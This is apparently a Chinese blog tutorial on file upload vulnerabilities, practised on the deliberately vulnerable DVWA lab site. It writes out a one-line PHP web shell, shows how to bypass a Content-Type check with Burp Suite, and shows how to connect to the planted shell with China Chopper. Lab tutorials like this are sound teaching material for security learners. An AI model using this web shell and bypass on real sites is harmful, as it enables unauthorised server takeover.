Web安全之文件上传漏洞

最近接触了Web安全,有点沉迷,这里介绍一种网站的文件上传漏洞
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络空间需要我们共同维护。
需要的工具:火狐浏览器,Burp Suit,phpstudy,中国菜刀
第一步:

首先这是一个利用phpstudy搭建的网站,网站源码可以在github上搜DVWA,用来当做靶机测试,这个网站有各种各样的漏洞。

我们找到文件上传这一项,先上传一个jpg文件测试一下
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到上传成功了

第二步:

上传一个一句话木马,一句话木马由php编写,代码如下:

<?php eval($_POST['cmd']); ?>

我们尝试上传这个一句话木马
在这里插入图片描述
发现只能上传图片格式的文件,php文件禁止上传。

第三步:

在设置里面修改火狐浏览器的代理服务器
在这里插入图片描述
http代理设置为127.0.0.1,也就是本机,端口设置为8080。这一步是为了抓包。

第四步:

回到上传文件的网站页面,选中编写的一句话木马,先不要点上传。

打开Burp Suit,在option里设置抓取IP为127.0.0.1,端口为8080的包,一般是默认的,这一步可以忽略。

点击上传文件,这时候Burp就抓到了你要发送的数据包,打开burp,内容如下
在这里插入图片描述
这里要说明的是,有些网站检查你上传的文件类型是通过数据包中的Content_Type 选项来判断。

我们将导数第三行的Content-Type的参数application/octet-stream修改为 image/png,再点击Forward将包释放。

这个时候发现文件上传成功了并且有上传路径。
在这里插入图片描述

第五步:

打开中国菜刀,这里的中国菜刀是管理网站的工具,可不是家里切菜的菜刀(滑稽),开发这个工具的人也是一个传奇,有兴趣的同学可以上网搜一下。

右键添加SHELL,地址栏输入你上传的一句话木马的位置,地址栏后边是密码,也就是我们写的一句话脚本中的中括号里的部分,点击添加之后出现下面的界面
在这里插入图片描述
双击之后进行连接,这时候就成功啦,下面就可以进行一些其他的操作。

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值